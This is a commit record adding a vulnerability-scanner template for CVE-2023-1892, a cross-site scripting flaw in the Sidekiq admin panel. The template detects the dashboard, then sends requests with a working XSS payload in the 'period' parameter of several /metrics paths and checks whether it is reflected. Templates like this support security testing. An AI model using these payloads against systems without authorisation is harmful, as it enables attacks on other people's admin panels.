Create CVE-2023-1892.yaml

patch-1
Ritik Chaddha 2024-04-25 16:12:58 +05:30 committed by GitHub
parent fa711a5560
commit bc5bea48fa
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 64 additions and 0 deletions

View File

@ -0,0 +1,64 @@
id: CVE-2023-1892
info:
name: Sidekiq < 7.0.8 - Cross-Site Scripting
author: ritikchaddha,princechaddha
severity: high
description: |
An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.
reference:
- https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777
- https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
- https://nvd.nist.gov/vuln/detail/CVE-2023-1892
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
cvss-score: 8.3
cve-id: CVE-2023-1892
cwe-id: CWE-79
cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: contribsys
product: sidekiq
fofa-query: title="Sidekiq"
tags: cve,cve2023,sidekiq,contribsys,xss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/queues"
matchers:
- type: word
internal: true
part: body
words:
- "Sidekiq"
- "Dashboard</a>"
condition: and
- method: GET
path:
- "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
- "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
- "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img/src/onerror=alert(document.domain)>"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200